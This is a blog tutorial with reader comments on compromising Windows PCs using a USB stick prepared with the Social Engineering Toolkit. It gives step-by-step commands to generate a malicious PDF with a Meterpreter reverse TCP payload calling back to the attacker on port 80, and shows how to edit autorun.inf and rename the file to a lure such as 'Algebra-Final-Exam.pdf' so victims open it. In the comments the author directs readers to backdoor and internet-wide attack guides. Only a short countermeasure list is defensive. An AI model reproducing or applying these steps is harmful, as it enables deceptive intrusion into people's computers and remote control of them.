Hacking Windows Using USB Stick + Social Engineering Toolkit
Type : Tutorial
Level : Easy (especially if you’ve already read and practice this tutorial before)
If my previous tutorial about Adobe PDF escape EXE social engineering talking about sending malicious PDF via e-mail and then the victim execute the file, today we will learn about how if we attack the victim via USB?
As you know, USB was very famous and also very popular, maybe from 10 people 9 of them have USB stick for external storage or some people use it for transfer data from one to another computer. Maybe when you hear someone talk to another like this “Hey, can I copy the last picture we go together with class? here I give you my USB, please copy it inside” I think you should know what they doing 
Here in this tutorial we will not learn to copy and paste picture, but how to make someone open our malicious file inside our USB. Okay….let’s start!
Requirements :
2. Operating System Windows or Linux (In Backtrack 5, metasploit already included inside)
Step By Step :
1. Open your console/terminal (CTRL+ALT+T) and then change your working directory to /pentest/exploits/set.
cd /pentest/exploits/set
2. Run your Social Engineering Toolkit using ./set command.
3. Choose number 3 Infectious Media Generator, and then for the next step you can choose File-Format Exploits because we won’t use straight executables exploit.
Enter IP Address for Reverse Connection –> fill in with your IP Address(Attacker IP Address)
4. Select the file format exploit you want :
Actually you can choose what exploit you want to use, but in this case I’m using the default one number 11 “Adobe PDF EXE Social Engineering”
5. The next option is choose your PDF.
If you have your own PDF it was better, maybe you can use something that interest another people curious to open it, in this case I’m using my PDF Algebra-Final-Exam.pdf because I think it was really interesting file name
You also can leave this option blank to use blank PDF attack, but I think it’s better to use your own PDF so you can measure your victim.
6. The next step you need to choose which payload you want to use. As usual I like to choose Meterpreter reverse TCP payload
7. Enter the port to conneck back on. In this step, I choose port 80 because port 80 was magic port that always allowed by firewall
There should be a question “Do you want to create a listener right now? [yes|no]” choose YES.
Open new console/terminal (CTRL+ALT+T) and check your file inside autorun folder(see picture below) :
There’s two file autorun.inf and template.pdf inside the folder. If you see the filename, it’s not impossible the victim suspicious to that file because the name was really awful 
.
8. Let’s change a little bit the autorun.inf and template.pdf to make it more friendly
Change your working directory to autorun folder
cd /pentest/exploits/set/autorun
9. Do the following command :
pico autorun.inf
10. Inside autorun.inf, change the template.pdf to your desired file name :
[autorun] open=Algebra-Final-Exam.pdf icon=autorun.ico
then press CTRL + O to save and CTRL + X to exit.
To rename the PDF into our desired filename, do the following command :
mv template.pdf Algebra-Final-Exam.pdf
It’s finish now, and you should copy the content to your USB.
9. When the victim plug our malicious USB and the autorun working (view previous tutorial on step 5), we have their shell now
PWNED!
Countermeasure :
1. Use firewall to detect inbound or outbound traffic…(remember : antivirus is not enough)
2. If there’s an error message, read it carefully.
3. Turn off your autorun/autoplay (see tutorial here how to do that).
Hope you enjoyed it!
Incoming search terms:
- backtrack 5 pdf
- Infectious Media Generator
- social engineering toolkit usb
- jpg pdf converter
- set infectious media generator
- backtrack5 pdf
- windows hacking tutorials pdf
- backtrack 5 metasploit tutorial pdf
- metasploit usb autorun
- usb autorun exploit
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
19 Responsesto “Hacking Windows Using USB Stick + Social Engineering Toolkit”
Trackbacks/Pingbacks
- Social Engineering Tabnabbing Attack + Ettercap Local DNS Poisoning | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] Open Social Engineering Toolkit Console (Click here to view tutorial how to open SET step 1 and [...]
Leave a Reply
Links
Get Updates via Networkedblogs
it's amazing tutorial but is that will work on win 7 or vista ?i will try it now
#jouj
I’ve try in windows 7 sp1 it won’t work.maybe win 7 without sp 1 it works
If you want to try at win 7 sp1, maybe you can follow this tutorial hacking-windows-7-sp-1-using-java-signed-applet-social-engineering-code-execution
Say I want to create a listener right now but use it later how would one go about doing so (because the victim isn't always online
#Uncle
You can create a backdoor then 5-steps-to-set-up-backdoor-after-successfully-compromising-target-using-backtrack-5 for future use.
Thanks I learned A LOT from your tutorials #Keep it up
#Uncle
You’re welcome
hii… how to use with dial up connection i get reply in local vmware os but cant being able to do outside my pc
#bhushan
yep of course it can’t because you didn’t have public ip…read the logic about attacking WAN here http://www.hacking-tutorial.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
thanks dear for replying … i know about that
but vpn and vos ares also not working anyways thanks i need a static ip i think 
#bhushan
I don’t think so it’s not work, because on my vps mine work nice…maybe you should set up your payload to connect back to another port that allowed by victim firewall
what backtrack should i use ?
backtrack 5 or backtrack 5 R1 ?
which one is better ?
thanks
btw nice tutorial sir
#versailles
You can use both of them.
sir, i’ a beginner for backtrack so i need the shortcut keyname & it’s function details so pls send it to my mail sir plssss….
manij1xxx@gmail.com
#manikandan
I don’t understand which shortcut? all command in backtrack was the same as linux you just need to define your search on google whether you use KDE or GNOME for your desktop environment.
I have 2 problems.
1. When I’m going through the filepaths to autorun I get up to exploits and I cant get in the set folder. I checked out the directory in the console to find set isnt even there. Then I viewed the file system visually and it WAS there… Ive always had problems with ls and cd commands to specific locations…
2. When you say “copy the content to your USB, what folder do you mean? Do you mean the autorun folder? Could you please specify the file locations?
#Bob
1. You can double press the tab key to show the folder content match with your prefix e.g: ls /pentest/ex[do the double tab]
2. The content of autorun folder
so i am fairly new to hacking but would love to learn more, what exactly is this tutorial for i dont really get it when you said we own their shell.
#henrie t
that’s mean that we already inside victim computer through exploit and payload we used. View more tutorial how to own victim here http://www.hacking-tutorial.com/category/hacking-tutorial/
So once we own it then what can we do with it?